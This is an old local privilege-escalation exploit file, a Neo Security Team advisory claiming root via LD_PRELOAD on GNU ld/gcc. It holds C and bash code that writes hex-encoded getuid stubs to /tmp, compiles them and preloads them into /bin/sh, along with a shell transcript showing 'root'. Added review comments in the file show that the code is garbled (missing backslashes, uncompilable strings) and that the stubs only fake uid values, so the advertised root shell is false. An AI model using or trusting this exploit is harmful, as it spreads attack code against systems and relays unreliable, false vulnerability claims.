/*
str0ke / tested on patched up debian box (nice local)
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #01 - 28/12/04
--------------------------------------------------------
Program: ld - The GNU linker
Homepage: http://gcc.gnu.org
Vulnerable Versions: GNU gcc 3.4.3 and prior
Risk: High!!
Impact: Unchecked length fields
---------------------------------------------------------
- Description
---------------------------------------------------------
$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
Value starts and ends with a slash and contains about 1200 characters.
LD_PRELOAD doesn't ignore setuid executables, like this one.
Unchecked length fields.
setuid(0);
setreuid(0,0);
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
- Tested
---------------------------------------------------------
I have done minimal testing on this.
Slackware 10.0
- Exploitation
---------------------------------------------------------
$gcc ld_xpl_nst.c -o ld_xp_nst
$./ld_xp_nst
sh-3.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.00#
This will give you a root shell
- Solutions
--------------------------------------------------------
Not yet, or I don't know xD
- References
--------------------------------------------------------
http://neosecurityteam.org/Advisories/Advisory-01.txt
- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>
[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.org/
Got questions? http://neosecurityteam.org/foros/
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * C source of the library that main() writes to /tmp/nst.c and compiles
 * with gcc -shared. Decoding the hex pairs gives the four stubs listed in
 * the header comment ("int getuid() { return 0; }" and the same for
 * geteuid/getgid/getegid, each followed by a newline), then "/bin/sh".
 *
 * NOTE(review): every escape here is spelled "x69" rather than "\x69", so
 * as the file stands this is the literal ASCII text "x69x6ex74..." and not
 * the bytes described above; the backslashes were presumably lost in
 * transcription. The tail "x0/bin/sh" is likewise suspect: with the
 * backslash restored, "\x0" would be a NUL, so the "%s" in main()'s
 * fprintf() would stop before "/bin/sh" in any case.
 */
char NstCode[] =
"x69x6ex74x20x67x65x74x75x69"
"x64x28x29x20x7bx20x72x65x74"
"x75x72x6ex20x30x3bx20x7dx0a"
"x69x6ex74x20x67x65x74x65x75"
"x69x64x28x29x20x7bx20x72x65"
"x74x75x72x6ex20x30x3bx20x7d"
"x0ax69x6ex74x20x67x65x74x67"
"x69x64x28x29x20x7bx20x72x65"
"x74x75x72x6ex20x30x3bx20x7d"
"x0ax69x6ex74x20x67x65x74x65"
"x67x69x64x28x29x20x7bx20x72"
"x65x74x75x72x6ex20x30x3bx20"
"x7dx0ax0/bin/sh";
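/* Terminal-attribute helpers; FG() and RC() are defined after main(). */
void FG(int Opt, int Colour);   /* emit an SGR "Opt;Colour" sequence */
void BG(int Colour);            /* declared here but never defined or used in this file */
void RC(void);                  /* emit the SGR reset sequence; (void) gives a real prototype */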
/*
 * Entry point. Prints a coloured banner, writes NstCode to a fixed path
 * under /tmp, builds it into a shared object with gcc, runs /bin/sh with
 * that object in LD_PRELOAD, then prints the banner again.
 *
 * Review notes (code left as found):
 *  - Both nested loops iterate exactly once (x == 1, y == 37), so each is
 *    equivalent to a single FG(1, 37) call.
 *  - fopen() may return NULL (for example if /tmp/nst.c already exists and
 *    is owned by another user); its result goes straight into fprintf(),
 *    which would be a NULL dereference. fclose() and both system() calls
 *    are unchecked as well.
 *  - /tmp/nst.c and /tmp/nst.nfo are fixed, predictable names in a
 *    world-writable directory; another local user can pre-create or
 *    replace them, so whoever runs this may compile and preload code
 *    that is not NstCode.
 *  - The printf() arguments below contain a raw line break inside the
 *    string literal; as written this does not compile. It was presumably
 *    "\n" before transcription.
 *  - The preloaded stubs only change what getuid()/geteuid()/getgid()/
 *    getegid() return to their callers; no call here alters process
 *    credentials. The shell - and the `id` shown in the header, which
 *    inherits LD_PRELOAD from that shell - therefore reports uid 0 without
 *    holding it. The header's claim about setuid binaries is not exercised
 *    by this code at all: /bin/sh is started directly, not a setuid program.
 *
 * Returns 0 unconditionally.
 */
int main()
{
FILE *Nst_C;
int x, y;
/* Single-iteration loops: x == 1, y == 37 only. */
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!
");
}
RC();
/* Unchecked fopen(): NULL here is dereferenced by the fprintf() below. */
Nst_C=fopen("/tmp/nst.c","w");
fprintf(Nst_C,"%s",NstCode);
fclose(Nst_C);
/* Return values of both system() calls are ignored. */
system("gcc -shared -o /tmp/nst.nfo /tmp/nst.c;rm -f /tmp/nst.c");
system("LD_PRELOAD=/tmp/nst.nfo /bin/sh");
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!
");
}
RC();
return 0;
}
/*
 * Writes an SGR control sequence selecting text attribute Opt and colour
 * Colour to stdout. Output is the format string with the two integers
 * substituted; nothing is returned.
 *
 * NOTE(review): the literal begins with " 33[" (space, '3', '3', '['); the
 * original was presumably "\033[" (ESC '['), with the backslash lost in
 * transcription. Reproduced byte-for-byte here.
 */
void FG(int Opt, int Colour) {
    fprintf(stdout, " 33[%d;%dm", Opt, Colour);
}
/*
 * Writes the SGR reset sequence to stdout, undoing a previous FG() call.
 * The literal has no conversion specifiers, so fputs() emits exactly the
 * bytes printf() would.
 *
 * NOTE(review): as in FG(), " 33[" is presumably a transcription of
 * "\033[" with the backslash dropped; kept byte-for-byte.
 */
void RC() {
    fputs(" 33[0;m", stdout);
}
/* Bash Code:
#! /bin/bash
echo -e "x69x6ex74x20x67x65x74x75x69x64x28x29x20x7bx20x72x65"
>/tmp/nst.c
echo -e "x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74x20x67x65x74"
>/tmp/nst.c
echo -e "x65x75x69x64x28x29x20x7bx20x72x65x74x75x72x6ex20x30"
>/tmp/nst.c
echo -e "x3bx20x7dx0ax69x6ex74x20x67x65x74x67x69x64x28x29x20"
>/tmp/nst.c
echo -e "x7bx20x72x65x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74"
>/tmp/nst.c
echo -e "x20x67x65x74x65x67x69x64x28x29x20x7bx20x72x65x74x75"
>/tmp/nst.c
echo -e "x72x6ex20x30x3bx20x7dx0ax0/bin/sh">/tmp/nst.c
sleep 1
gcc -shared -o /tmp/nst.nfo /tmp/nst.c
rm -rf /tmp/nst.c
sleep 4
echo -e "
"
export LD_LIBRARY_PATH=/tmp
LD_PRELOAD=/tmp/nst.nfo /bin/sh
*/